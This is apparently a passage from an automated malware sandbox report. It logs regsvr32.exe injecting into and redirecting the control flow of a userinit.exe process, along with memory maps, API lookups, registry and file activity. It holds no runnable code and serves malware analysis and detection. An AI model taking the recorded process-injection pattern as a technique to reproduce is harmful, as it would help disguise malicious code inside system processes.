private_0x00000000028d0000	0x028d0000	0x029befff	Private Memory	rw	-
private_0x00000000028e0000	0x028e0000	0x029d4fff	Private Memory	rw	-
private_0x00000000028e0000	0x028e0000	0x029d8fff	Private Memory	rw	-
private_0x00000000028e0000	0x028e0000	0x029dcfff	Private Memory	rw	-
private_0x00000000028e0000	0x028e0000	0x029e0fff	Private Memory	rw	-
private_0x00000000028f0000	0x028f0000	0x029f6fff	Private Memory	rw	-
private_0x00000000028f0000	0x028f0000	0x029fafff	Private Memory	rw	-
private_0x00000000028f0000	0x028f0000	0x029fffff	Private Memory	-	-
private_0x00000000029c0000	0x029c0000	0x02ab0fff	Private Memory	rw	-
private_0x00000000029f0000	0x029f0000	0x02af2fff	Private Memory	rw	-
private_0x0000000002a00000	0x02a00000	0x02b12fff	Private Memory	rwx	-
private_0x0000000002b20000	0x02b20000	0x02c1ffff	Private Memory	-	-
private_0x0000000002e00000	0x02e00000	0x02efffff	Private Memory	rw	-
sortdefault.nls	0x02f00000	0x031cefff	Memory Mapped File	r	-
comctl32.dll	0x6d740000	0x6d7c3fff	Memory Mapped File	rwx	-
olepro32.dll	0x6d820000	0x6d838fff	Memory Mapped File	rwx	-
oleacc.dll	0x71bf0000	0x71c2bfff	Memory Mapped File	rwx	-
dwmapi.dll	0x733b0000	0x733c2fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
wkscli.dll	0x73af0000	0x73afefff	Memory Mapped File	rwx	-
netutils.dll	0x73b00000	0x73b08fff	Memory Mapped File	rwx	-
netapi32.dll	0x73b10000	0x73b20fff	Memory Mapped File	rwx	-
comctl32.dll	0x73e90000	0x7402dfff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
srvcli.dll	0x74f10000	0x74f28fff	Memory Mapped File	rwx	-
msasn1.dll	0x750e0000	0x750ebfff	Memory Mapped File	rwx	-
crypt32.dll	0x751b0000	0x752ccfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
iertutil.dll	0x754c0000	0x756bafff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
urlmon.dll	0x75a80000	0x75bb5fff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
wininet.dll	0x76920000	0x76a14fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffdc000	0x7ffdc000	0x7ffdcfff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-
For performance reasons, the remaining 20 entries are omitted. The remaining entries can be found in flog.txt.

Injection Information

»

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#25: c:\windows\system32\regsvr32.exe	0xf1c	address = 0x400000, size = 405504	1	Fn Data
Modify Memory	#25: c:\windows\system32\regsvr32.exe	0xf1c	address = 0x7ffdf008, size = 4	1	Fn Data
Modify Control Flow	#25: c:\windows\system32\regsvr32.exe	0xf1c	os_tid = 0x950, address = 0x76f67098	1	Fn

Host Behavior

File (2)

»

Operation	Filename	Additional Information	Success	Count	Logfile
Create	C:\ProgramData\tempa\marxvxinhhmg.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ		1	Fn
Read	C:\ProgramData\tempa\marxvxinhhmg.gif	size = 1097216, size_out = 1097216		1	Fn

Registry (6)

»

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	-	2	Fn

Module (191)

»

Operation	Module	Additional Information	Count	Logfile
Load	C:\Windows\System32\userinit.ENU	base_address = 0x0	1	Fn
Load	C:\Windows\System32\userinit.EN	base_address = 0x0	1	Fn
Load	olepro32.dll	base_address = 0x6d820000	1	Fn
Load	netapi32.dll	base_address = 0x73b10000	1	Fn
Load	OLEAUT32.DLL	base_address = 0x758f0000	1	Fn
Get Handle	private_0x0000000000400000	base_address = 0x400000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	13	Fn
Get Handle	c:\windows\system32\oleaut32.dll	base_address = 0x758f0000	2	Fn
Get Handle	c:\windows\system32\user32.dll	base_address = 0x757b0000	6	Fn
Get Handle	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	base_address = 0x6d740000	2	Fn
Get Handle	c:\windows\system32\ole32.dll	base_address = 0x76a20000	1	Fn
Get Handle	netapi32.dll	base_address = 0x0	1	Fn
Get Handle	c:\windows\system32\netapi32.dll	base_address = 0x73b10000	1	Fn
Get Handle	c:\windows\system32\advapi32.dll	base_address = 0x76da0000	19	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = Ìì, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	netapi32.dll	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	12	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetDiskFreeSpaceExA, address_out = 0x753ff46f	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VariantChangeTypeEx, address_out = 0x758f4c28	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNeg, address_out = 0x7596c802	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNot, address_out = 0x7596ec66	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAdd, address_out = 0x75915934	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarSub, address_out = 0x7596d332	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMul, address_out = 0x7596dbd4	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDiv, address_out = 0x7596e405	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarIdiv, address_out = 0x7596f00a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMod, address_out = 0x7596f15e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAnd, address_out = 0x75915a98	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarOr, address_out = 0x7596ecfa	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarXor, address_out = 0x7596ee2e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCmp, address_out = 0x7590b0dc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarI4FromStr, address_out = 0x75906fab	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR4FromStr, address_out = 0x759101a0	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR8FromStr, address_out = 0x7590699e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDateFromStr, address_out = 0x75916ba7	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCyFromStr, address_out = 0x75936c12	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBoolFromStr, address_out = 0x7590dbd1	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromCy, address_out = 0x75917fdc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromDate, address_out = 0x75907a2a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromBool, address_out = 0x75910355	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetMonitorInfoA, address_out = 0x757bc34e	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetSystemMetrics, address_out = 0x757c67cf	2	Fn
Get Address	c:\windows\system32\user32.dll	function = EnumDisplayMonitors, address_out = 0x757c34a3	2	Fn
Get Address	c:\windows\system32\user32.dll	function = AnimateWindow, address_out = 0x757e0620	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = InitializeFlatSB, address_out = 0x6d77266f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = UninitializeFlatSB, address_out = 0x6d772542	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollProp, address_out = 0x6d771d29	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollProp, address_out = 0x6d77238d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_EnableScrollBar, address_out = 0x6d7720c9	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_ShowScrollBar, address_out = 0x6d771fdb	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollRange, address_out = 0x6d771e8d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollInfo, address_out = 0x6d771f0f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollPos, address_out = 0x6d771ccd	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollPos, address_out = 0x6d77216d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollInfo, address_out = 0x6d7722be	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollRange, address_out = 0x6d7721e2	2	Fn
Get Address	c:\windows\system32\user32.dll	function = SetLayeredWindowAttributes, address_out = 0x757ba6dc	2	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoCreateInstanceEx, address_out = 0x76a69d4e	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoInitializeEx, address_out = 0x76a609ad	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoAddRefServerProcess, address_out = 0x76a83cf3	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoReleaseServerProcess, address_out = 0x76a84314	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoResumeClassObjects, address_out = 0x76a2ea02	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoSuspendClassObjects, address_out = 0x76a8bb02	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePropertyFrame, address_out = 0x6d8220ea	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreateFontIndirect, address_out = 0x6d8220b7	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePictureIndirect, address_out = 0x6d8220c8	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleLoadPicture, address_out = 0x6d8220d9	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetVersionExA, address_out = 0x753c3861	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetServerGetInfo, address_out = 0x74f13cfa	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetApiBufferFree, address_out = 0x73b013d2	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LocalFree, address_out = 0x753bca64	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentThread, address_out = 0x753c3351	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenThreadToken, address_out = 0x76db432c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentProcess, address_out = 0x753bcdcf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenProcessToken, address_out = 0x76db4304	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = MapGenericMask, address_out = 0x76dc7a73	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetTokenInformation, address_out = 0x76db431c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetLastError, address_out = 0x753bbf00	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapAlloc, address_out = 0x76f72dd6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapFree, address_out = 0x753bbbd0	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CloseHandle, address_out = 0x753bca7c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityInfo, address_out = 0x76dab3e4	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorControl, address_out = 0x76daaddf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorOwner, address_out = 0x76daadf7	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorGroup, address_out = 0x76daae27	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorDacl, address_out = 0x76db41a6	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = IsValidAcl, address_out = 0x76da8523	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetAce, address_out = 0x76db45f0	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorSacl, address_out = 0x76db4608	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetLengthSid, address_out = 0x76db413b	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalAlloc, address_out = 0x753b9ce1	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = InitializeAcl, address_out = 0x76db45cd	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetLastError, address_out = 0x753bbb08	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthorityCount, address_out = 0x76db0e0c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidIdentifierAuthority, address_out = 0x76daa935	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthority, address_out = 0x76db0e24	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = AddAce, address_out = 0x76daae0f	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalFree, address_out = 0x753b9cf9	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = SetSecurityInfo, address_out = 0x76da9edf	1	Fn

Window (3)

»

Operation	Window Name	Additional Information	Count	Logfile
Create	userinit	class_name = TApplication, wndproc_parameter = 0	1	Fn
Find	marxvxinhhm0131	-	1	Fn
Set Attribute	userinit	class_name = TApplication, index = 18446744073709551612, new_long = 856047	1	Fn

Keyboard (6)

»

Operation	Additional Information	Count	Logfile
Get Info	type = 0, result_out = 4	2	Fn
Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721	2	Fn
Get Info	type = KB_LOCALE_ID	2	Fn

System (10)

»

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = CRH2YWU7	1	Fn
Get Info	type = Operating System	6	Fn
Get Info	type = Operating System	3	Fn

Process #58: userinit.exe

222

0

»

Information	Value
ID	#58
File Name	c:\windows\system32\userinit.exe
Command Line	"C:\Windows\System32\userinit.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:03:40, Reason: Child Process
Unmonitor	End Time: 00:03:44, Reason: Self Terminated
Monitor Duration	00:00:04

OS Process Information

»

Information	Value
PID	0x944
Parent PID	0xf0c (c:\windows\system32\regsvr32.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 940 0x 970 0x 974

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
private_0x0000000000050000	0x00050000	0x0008ffff	Private Memory	rw	-
private_0x0000000000090000	0x00090000	0x00090fff	Private Memory	rw	-
private_0x00000000000a0000	0x000a0000	0x000a0fff	Private Memory	rwx	-
pagefile_0x00000000000b0000	0x000b0000	0x000b6fff	Pagefile Backed Memory	r	-
pagefile_0x00000000000c0000	0x000c0000	0x000c1fff	Pagefile Backed Memory	rw	-
private_0x00000000000d0000	0x000d0000	0x001cffff	Private Memory	rw	-
locale.nls	0x001d0000	0x00236fff	Memory Mapped File	r	-
private_0x0000000000240000	0x00240000	0x002bffff	Private Memory	rw	-
userinit.exe	0x002c0000	0x002c8fff	Memory Mapped File	rwx	-
pagefile_0x00000000002d0000	0x002d0000	0x00397fff	Pagefile Backed Memory	r	-
oleaccrc.dll	0x003a0000	0x003a0fff	Memory Mapped File	r	-
private_0x00000000003b0000	0x003b0000	0x003b0fff	Private Memory	rwx	-
pagefile_0x00000000003c0000	0x003c0000	0x003c1fff	Pagefile Backed Memory	r	-
private_0x0000000000400000	0x00400000	0x00462fff	Private Memory	rwx	-
pagefile_0x0000000000470000	0x00470000	0x00570fff	Pagefile Backed Memory	r	-
private_0x00000000005a0000	0x005a0000	0x005affff	Private Memory	rw	-
pagefile_0x00000000005b0000	0x005b0000	0x011affff	Pagefile Backed Memory	r	-
private_0x00000000011b0000	0x011b0000	0x012affff	Private Memory	-	-
private_0x00000000012b0000	0x012b0000	0x01330fff	Private Memory	rw	-
private_0x00000000012b0000	0x012b0000	0x01334fff	Private Memory	rw	-
private_0x00000000012b0000	0x012b0000	0x01338fff	Private Memory	rw	-
private_0x00000000012b0000	0x012b0000	0x0133cfff	Private Memory	rw	-
private_0x00000000012b0000	0x012b0000	0x01340fff	Private Memory	rw	-
private_0x00000000012b0000	0x012b0000	0x01344fff	Private Memory	rw	-
private_0x00000000012b0000	0x012b0000	0x01348fff	Private Memory	rw	-
private_0x00000000012b0000	0x012b0000	0x0134cfff	Private Memory	rw	-
private_0x00000000012b0000	0x012b0000	0x01350fff	Private Memory	rw	-
private_0x00000000012b0000	0x012b0000	0x01354fff	Private Memory	rw	-
private_0x00000000012b0000	0x012b0000	0x01358fff	Private Memory	rw	-
private_0x00000000012b0000	0x012b0000	0x0135cfff	Private Memory	rw	-
private_0x00000000012b0000	0x012b0000	0x01360fff	Private Memory	rw	-
private_0x00000000012b0000	0x012b0000	0x01364fff	Private Memory	rw	-
private_0x00000000012b0000	0x012b0000	0x01368fff	Private Memory	rw	-
private_0x00000000012b0000	0x012b0000	0x0136cfff	Private Memory	rw	-
private_0x00000000012b0000	0x012b0000	0x01370fff	Private Memory	rw	-
private_0x00000000012b0000	0x012b0000	0x01374fff	Private Memory	rw	-
private_0x00000000012b0000	0x012b0000	0x01378fff	Private Memory	rw	-
private_0x00000000012b0000	0x012b0000	0x0137cfff	Private Memory	rw	-
private_0x0000000001380000	0x01380000	0x0138ffff	Private Memory	rw	-
private_0x0000000001390000	0x01390000	0x0159ffff	Private Memory	rw	-
pagefile_0x0000000001390000	0x01390000	0x0146efff	Pagefile Backed Memory	r	-
private_0x0000000001470000	0x01470000	0x014f2fff	Private Memory	rw	-
private_0x0000000001470000	0x01470000	0x014f6fff	Private Memory	rw	-
private_0x0000000001470000	0x01470000	0x014fafff	Private Memory	rw	-
private_0x0000000001470000	0x01470000	0x014fefff	Private Memory	rw	-
private_0x0000000001470000	0x01470000	0x01502fff	Private Memory	rw	-
private_0x0000000001470000	0x01470000	0x01506fff	Private Memory	rw	-
private_0x0000000001470000	0x01470000	0x0150afff	Private Memory	rw	-
private_0x0000000001470000	0x01470000	0x0150efff	Private Memory	rw	-
private_0x0000000001470000	0x01470000	0x01512fff	Private Memory	rw	-
private_0x0000000001470000	0x01470000	0x01516fff	Private Memory	rw	-
private_0x0000000001470000	0x01470000	0x0151afff	Private Memory	rw	-
private_0x0000000001470000	0x01470000	0x0151efff	Private Memory	rw	-
private_0x0000000001470000	0x01470000	0x01522fff	Private Memory	rw	-
private_0x0000000001470000	0x01470000	0x01526fff	Private Memory	rw	-
private_0x0000000001470000	0x01470000	0x0152afff	Private Memory	rw	-
private_0x0000000001470000	0x01470000	0x0152efff	Private Memory	rw	-
private_0x0000000001470000	0x01470000	0x01532fff	Private Memory	rw	-
private_0x0000000001470000	0x01470000	0x01536fff	Private Memory	rw	-
private_0x0000000001470000	0x01470000	0x0153afff	Private Memory	rw	-
private_0x0000000001470000	0x01470000	0x0153efff	Private Memory	rw	-
private_0x0000000001470000	0x01470000	0x01542fff	Private Memory	rw	-
private_0x0000000001470000	0x01470000	0x01546fff	Private Memory	rw	-
private_0x0000000001470000	0x01470000	0x0154afff	Private Memory	rw	-
private_0x0000000001470000	0x01470000	0x0154efff	Private Memory	rw	-
private_0x0000000001470000	0x01470000	0x01552fff	Private Memory	rw	-
private_0x0000000001470000	0x01470000	0x01556fff	Private Memory	rw	-
private_0x0000000001470000	0x01470000	0x0155afff	Private Memory	rw	-
private_0x0000000001470000	0x01470000	0x0155efff	Private Memory	rw	-
private_0x0000000001560000	0x01560000	0x0159ffff	Private Memory	rw	-
private_0x00000000015a0000	0x015a0000	0x0170ffff	Private Memory	rw	-
private_0x00000000015a0000	0x015a0000	0x016acfff	Private Memory	rw	-
private_0x00000000016d0000	0x016d0000	0x0170ffff	Private Memory	rw	-
staticcache.dat	0x01710000	0x0203ffff	Memory Mapped File	r	-
pagefile_0x0000000002040000	0x02040000	0x02432fff	Pagefile Backed Memory	r	-
private_0x0000000002440000	0x02440000	0x0253ffff	Private Memory	rw	-
private_0x0000000002540000	0x02540000	0x0273ffff	Private Memory	rw	-
private_0x0000000002740000	0x02740000	0x02810fff	Private Memory	rw	-
private_0x0000000002740000	0x02740000	0x02814fff	Private Memory	rw	-
private_0x0000000002740000	0x02740000	0x02818fff	Private Memory	rw	-
private_0x0000000002740000	0x02740000	0x0281cfff	Private Memory	rw	-
private_0x0000000002740000	0x02740000	0x02820fff	Private Memory	rw	-
private_0x0000000002740000	0x02740000	0x02824fff	Private Memory	rw	-
private_0x0000000002740000	0x02740000	0x02828fff	Private Memory	rw	-
private_0x0000000002740000	0x02740000	0x0282cfff	Private Memory	rw	-
private_0x0000000002740000	0x02740000	0x02830fff	Private Memory	rw	-
private_0x0000000002740000	0x02740000	0x02834fff	Private Memory	rw	-
private_0x0000000002740000	0x02740000	0x02838fff	Private Memory	rw	-
private_0x0000000002740000	0x02740000	0x0283cfff	Private Memory	rw	-
private_0x0000000002740000	0x02740000	0x02842fff	Private Memory	rw	-
private_0x0000000002740000	0x02740000	0x02846fff	Private Memory	rw	-
private_0x0000000002740000	0x02740000	0x0284afff	Private Memory	rw	-
private_0x0000000002740000	0x02740000	0x0284ffff	Private Memory	-	-
private_0x0000000002840000	0x02840000	0x02932fff	Private Memory	rw	-
private_0x0000000002840000	0x02840000	0x02936fff	Private Memory	rw	-
private_0x0000000002840000	0x02840000	0x0293afff	Private Memory	rw	-
private_0x0000000002840000	0x02840000	0x0293efff	Private Memory	rw	-
private_0x0000000002850000	0x02850000	0x02954fff	Private Memory	rw	-
private_0x0000000002850000	0x02850000	0x02958fff	Private Memory	rw	-
private_0x0000000002850000	0x02850000	0x0295cfff	Private Memory	rw	-
private_0x0000000002940000	0x02940000	0x02a40fff	Private Memory	rw	-
private_0x0000000002960000	0x02960000	0x02a72fff	Private Memory	rwx	-
private_0x0000000002a80000	0x02a80000	0x02b7ffff	Private Memory	-	-
private_0x0000000002bd0000	0x02bd0000	0x02c0ffff	Private Memory	rw	-
private_0x0000000002ce0000	0x02ce0000	0x02ddffff	Private Memory	rw	-
sortdefault.nls	0x02de0000	0x030aefff	Memory Mapped File	r	-
comctl32.dll	0x6d740000	0x6d7c3fff	Memory Mapped File	rwx	-
olepro32.dll	0x6d800000	0x6d818fff	Memory Mapped File	rwx	-
oleacc.dll	0x71bf0000	0x71c2bfff	Memory Mapped File	rwx	-
dwmapi.dll	0x733b0000	0x733c2fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
wkscli.dll	0x73af0000	0x73afefff	Memory Mapped File	rwx	-
netutils.dll	0x73b00000	0x73b08fff	Memory Mapped File	rwx	-
netapi32.dll	0x73b10000	0x73b20fff	Memory Mapped File	rwx	-
comctl32.dll	0x73e90000	0x7402dfff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
srvcli.dll	0x74f10000	0x74f28fff	Memory Mapped File	rwx	-
msasn1.dll	0x750e0000	0x750ebfff	Memory Mapped File	rwx	-
crypt32.dll	0x751b0000	0x752ccfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
iertutil.dll	0x754c0000	0x756bafff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
urlmon.dll	0x75a80000	0x75bb5fff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
wininet.dll	0x76920000	0x76a14fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffdc000	0x7ffdc000	0x7ffdcfff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-
